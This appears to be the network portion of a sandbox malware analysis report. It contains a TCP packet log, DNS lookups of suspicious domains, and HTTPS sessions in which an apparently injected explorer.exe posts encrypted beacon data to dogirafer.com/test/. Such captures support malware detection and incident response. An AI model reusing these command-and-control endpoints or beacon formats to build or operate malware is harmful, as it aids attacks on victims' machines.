                                                                                                                                                                              Dec 3, 2024 17:46:31.271085978 CET50038443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:31.271130085 CET44350038104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:31.271202087 CET50038443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:31.271553993 CET50038443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:31.271569014 CET44350038104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:32.535201073 CET44350038104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:32.535273075 CET50038443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:32.535841942 CET50038443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:32.535852909 CET44350038104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:32.536092043 CET50038443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:32.536097050 CET44350038104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:34.164037943 CET44350038104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:34.164169073 CET44350038104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:34.167273045 CET50038443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:34.167273045 CET50038443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:34.218940020 CET50039443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:34.218998909 CET44350039104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:34.219108105 CET50039443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:34.219482899 CET50039443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:34.219499111 CET44350039104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:34.464759111 CET50038443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:34.464781046 CET44350038104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:35.482191086 CET44350039104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:35.482630968 CET50039443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:35.483274937 CET50039443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:35.483288050 CET44350039104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:35.483654022 CET50039443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:35.483661890 CET44350039104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:37.154943943 CET44350039104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:37.155004025 CET50039443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:37.155049086 CET44350039104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:37.155064106 CET44350039104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:37.155092001 CET50039443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:37.155122042 CET50039443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:37.155461073 CET50039443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:37.155483007 CET44350039104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:37.406027079 CET50040443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:37.406065941 CET44350040104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:37.406135082 CET50040443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:37.406620979 CET50040443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:37.406635046 CET44350040104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:38.669828892 CET44350040104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:38.669900894 CET50040443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:38.670545101 CET50040443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:38.670557976 CET44350040104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:38.670803070 CET50040443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:38.670806885 CET44350040104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:40.295681953 CET44350040104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:40.295772076 CET44350040104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:40.300913095 CET50040443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:40.309459925 CET50040443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:40.309479952 CET44350040104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:40.703177929 CET50041443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:40.703229904 CET44350041104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:40.703299046 CET50041443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:40.703917980 CET50041443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:40.703929901 CET44350041104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:41.919331074 CET44350041104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:41.921133995 CET50041443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:41.921644926 CET50041443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:41.921644926 CET50041443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:41.921652079 CET44350041104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:41.921665907 CET44350041104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:43.513241053 CET44350041104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:43.513353109 CET44350041104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:43.513355017 CET50041443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:43.513566971 CET50041443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:43.513767958 CET50041443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:43.513783932 CET44350041104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:43.613526106 CET50042443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:43.613559008 CET44350042104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:43.614111900 CET50042443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:43.614916086 CET50042443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:43.614929914 CET44350042104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:44.882911921 CET44350042104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:44.882993937 CET50042443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:44.883688927 CET50042443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:44.883701086 CET44350042104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:44.883863926 CET50042443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:44.883874893 CET44350042104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:46.549597025 CET44350042104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:46.549669027 CET50042443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:46.549681902 CET44350042104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:46.549695015 CET44350042104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:46.549752951 CET50042443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:46.549752951 CET50042443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:46.550462961 CET50042443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:46.550477982 CET44350042104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:46.660290003 CET50043443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:46.660342932 CET44350043104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:46.660402060 CET50043443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:46.660797119 CET50043443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:46.660810947 CET44350043104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:47.937808037 CET44350043104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:47.937902927 CET50043443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:47.938448906 CET50043443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:47.938455105 CET44350043104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:47.938709974 CET50043443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:47.938714981 CET44350043104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:49.573447943 CET44350043104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:49.573549032 CET44350043104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:49.573647976 CET50043443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:49.574176073 CET50043443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:49.574192047 CET44350043104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:49.638103962 CET50044443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:49.638163090 CET44350044104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:49.639028072 CET50044443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:49.642945051 CET50044443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:49.642965078 CET44350044104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:50.975056887 CET44350044104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:50.975117922 CET50044443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:50.975620985 CET50044443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:50.975626945 CET44350044104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:50.976047039 CET50044443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:50.976052999 CET44350044104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:52.624910116 CET44350044104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:52.624977112 CET50044443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:52.624996901 CET44350044104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:52.625020981 CET44350044104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:52.625067949 CET50044443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:52.625330925 CET50044443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:52.625349998 CET44350044104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:52.699645042 CET50045443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:52.699692011 CET44350045104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:52.699791908 CET50045443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:52.700160980 CET50045443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:52.700172901 CET44350045104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:54.007546902 CET44350045104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:54.009056091 CET50045443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:54.016364098 CET50045443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:54.016364098 CET50045443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:54.016376972 CET44350045104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:54.016393900 CET44350045104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:55.621129036 CET44350045104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:55.621211052 CET44350045104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:55.623063087 CET50045443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:55.625025034 CET50045443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:55.625046968 CET44350045104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:55.701091051 CET50046443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:55.701129913 CET44350046104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:55.705375910 CET50046443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:55.705677032 CET50046443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:55.705697060 CET44350046104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:56.971674919 CET44350046104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:56.971791983 CET50046443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:56.979481936 CET50046443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:56.979486942 CET44350046104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:56.980015993 CET50046443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:56.980020046 CET44350046104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:58.640680075 CET44350046104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:58.640752077 CET50046443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:58.640762091 CET44350046104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:58.640786886 CET44350046104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:58.640818119 CET50046443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:58.640831947 CET50046443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:58.641356945 CET50046443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:58.641371965 CET44350046104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:58.731570959 CET50047443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:58.731620073 CET44350047104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:58.731683016 CET50047443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:58.732060909 CET50047443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:58.732075930 CET44350047104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:47:00.009737015 CET44350047104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:47:00.013389111 CET50047443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:47:00.014015913 CET50047443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:47:00.014015913 CET50047443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:47:00.014027119 CET44350047104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:47:00.014045000 CET44350047104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:47:01.667237043 CET44350047104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:47:01.667345047 CET44350047104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:47:01.670562029 CET50047443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:47:01.671770096 CET50047443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:47:01.671792030 CET44350047104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:47:01.838841915 CET50048443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:47:01.838885069 CET44350048104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:47:01.839093924 CET50048443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:47:01.839363098 CET50048443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:47:01.839378119 CET44350048104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:47:03.056358099 CET44350048104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:47:03.056417942 CET50048443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:47:03.056860924 CET50048443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:47:03.056869984 CET44350048104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:47:03.057051897 CET50048443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:47:03.057056904 CET44350048104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:47:04.446767092 CET44350048104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:47:04.446893930 CET50048443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:47:04.446898937 CET44350048104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:47:04.446996927 CET50048443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:47:04.447458982 CET50048443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:47:04.447474003 CET44350048104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:47:04.717176914 CET50049443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:47:04.717212915 CET44350049104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:47:04.717273951 CET50049443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:47:04.717664003 CET50049443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:47:04.717678070 CET44350049104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:47:05.980613947 CET44350049104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:47:05.980917931 CET50049443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:47:05.981571913 CET50049443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:47:05.981571913 CET50049443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:47:05.981579065 CET44350049104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:47:05.981592894 CET44350049104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:47:07.616720915 CET44350049104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:47:07.616821051 CET44350049104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:47:07.616838932 CET50049443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:47:07.616884947 CET50049443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:47:09.294464111 CET50049443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:47:09.294481993 CET44350049104.21.68.89192.168.2.4
                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                              Dec 3, 2024 17:43:05.333806992 CET6096753192.168.2.41.1.1.1
                                                                                                                                                                              Dec 3, 2024 17:43:06.009567976 CET53609671.1.1.1192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:43:17.188621998 CET5971253192.168.2.41.1.1.1
                                                                                                                                                                              Dec 3, 2024 17:43:17.560465097 CET53597121.1.1.1192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:44:46.378952026 CET5320653192.168.2.41.1.1.1
                                                                                                                                                                              Dec 3, 2024 17:44:47.370980024 CET5320653192.168.2.41.1.1.1
                                                                                                                                                                              Dec 3, 2024 17:44:48.371179104 CET5320653192.168.2.41.1.1.1
                                                                                                                                                                              Dec 3, 2024 17:44:50.386573076 CET5320653192.168.2.41.1.1.1
                                                                                                                                                                              Dec 3, 2024 17:44:52.707484007 CET53532061.1.1.1192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:44:52.707532883 CET53532061.1.1.1192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:44:52.707602024 CET53532061.1.1.1192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:44:52.707612991 CET53532061.1.1.1192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:44:52.794950008 CET6398953192.168.2.41.1.1.1
                                                                                                                                                                              Dec 3, 2024 17:44:53.087979078 CET53639891.1.1.1192.168.2.4
                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                              Dec 3, 2024 17:43:05.333806992 CET192.168.2.41.1.1.10xf8bbStandard query (0)huanvn.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 3, 2024 17:43:17.188621998 CET192.168.2.41.1.1.10xb3acStandard query (0)vutarf.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 3, 2024 17:44:46.378952026 CET192.168.2.41.1.1.10xc5b6Standard query (0)reateberam.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 3, 2024 17:44:47.370980024 CET192.168.2.41.1.1.10xc5b6Standard query (0)reateberam.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 3, 2024 17:44:48.371179104 CET192.168.2.41.1.1.10xc5b6Standard query (0)reateberam.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 3, 2024 17:44:50.386573076 CET192.168.2.41.1.1.10xc5b6Standard query (0)reateberam.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 3, 2024 17:44:52.794950008 CET192.168.2.41.1.1.10x8d8cStandard query (0)dogirafer.comA (IP address)IN (0x0001)false
                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                              Dec 3, 2024 17:43:06.009567976 CET1.1.1.1192.168.2.40xf8bbNo error (0)huanvn.com103.57.249.207A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 3, 2024 17:43:17.560465097 CET1.1.1.1192.168.2.40xb3acNo error (0)vutarf.com94.232.43.224A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 3, 2024 17:43:19.441998959 CET1.1.1.1192.168.2.40xd4b0No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 3, 2024 17:43:19.441998959 CET1.1.1.1192.168.2.40xd4b0No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 3, 2024 17:44:52.707484007 CET1.1.1.1192.168.2.40xc5b6Server failure (2)reateberam.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 3, 2024 17:44:52.707532883 CET1.1.1.1192.168.2.40xc5b6Server failure (2)reateberam.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 3, 2024 17:44:52.707602024 CET1.1.1.1192.168.2.40xc5b6Server failure (2)reateberam.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 3, 2024 17:44:52.707612991 CET1.1.1.1192.168.2.40xc5b6Server failure (2)reateberam.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 3, 2024 17:44:53.087979078 CET1.1.1.1192.168.2.40x8d8cNo error (0)dogirafer.com104.21.68.89A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 3, 2024 17:44:53.087979078 CET1.1.1.1192.168.2.40x8d8cNo error (0)dogirafer.com172.67.192.128A (IP address)IN (0x0001)false
                                                                                                                                                                              • dogirafer.com
                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              0192.168.2.449851104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:44:54 UTC411OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hmdViRxTPtzmAYfxODCSjYG4qyuCXJYVCgmRH81hrW6/ictDFrUzQseub33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCb68dkVTPeGVOG9+uNo=
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 92
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:44:54 UTC92OUTData Raw: 4c 48 44 4d 46 38 2f 6d 69 75 38 77 5a 78 61 4b 31 32 79 31 6e 6e 78 4f 50 30 44 66 44 43 71 37 50 4b 48 76 2f 6d 4f 49 4d 47 66 2f 7a 54 71 76 33 47 2f 55 36 50 72 6f 73 79 45 36 65 52 70 37 49 38 33 73 6e 6b 68 63 57 65 2f 71 78 36 78 74 7a 50 48 55 30 36 70 42 69 45 45 3d
                                                                                                                                                                              Data Ascii: LHDMF8/miu8wZxaK12y1nnxOP0DfDCq7PKHv/mOIMGf/zTqv3G/U6ProsyE6eRp7I83snkhcWe/qx6xtzPHU06pBiEE=
                                                                                                                                                                              2024-12-03 16:44:55 UTC791INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:44:55 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AuBzvzD76dL224KwDweftJXB8sucAz0nbU%2B8K4ns3u%2BsoNiVY5Jl4VQ9P%2BsgzhS9z0HkKP%2FaJlRpfz5O88sT6a%2Bk71PShGbnSm7JP6H7%2BY6%2FvQHCQOHyu36jePJBzIlK"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec5062989abc334-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1725&min_rtt=1484&rtt_var=1038&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1163&delivery_rate=855552&cwnd=247&unsent_bytes=0&cid=3924a51713f30bd0&ts=1604&x=0"
                                                                                                                                                                              2024-12-03 16:44:55 UTC98INData Raw: 35 63 0d 0a 4f 43 69 66 51 38 57 7a 33 6f 70 68 59 68 6a 62 6a 57 62 6c 67 33 39 4f 4d 30 50 56 44 53 44 43 62 66 61 30 74 79 58 45 62 57 6d 63 70 6d 48 34 31 47 37 53 37 50 71 47 74 6a 5a 74 4a 6b 55 74 65 4e 2f 6c 67 6c 67 6c 43 62 4f 35 33 71 6b 4c 73 5a 65 70 70 38 39 79 30 42 73 3d 0d 0a
                                                                                                                                                                              Data Ascii: 5cOCifQ8Wz3ophYhjbjWblg39OM0PVDSDCbfa0tyXEbWmcpmH41G7S7PqGtjZtJkUteN/lglglCbO53qkLsZepp89y0Bs=
                                                                                                                                                                              2024-12-03 16:44:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              1192.168.2.449861104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:44:58 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
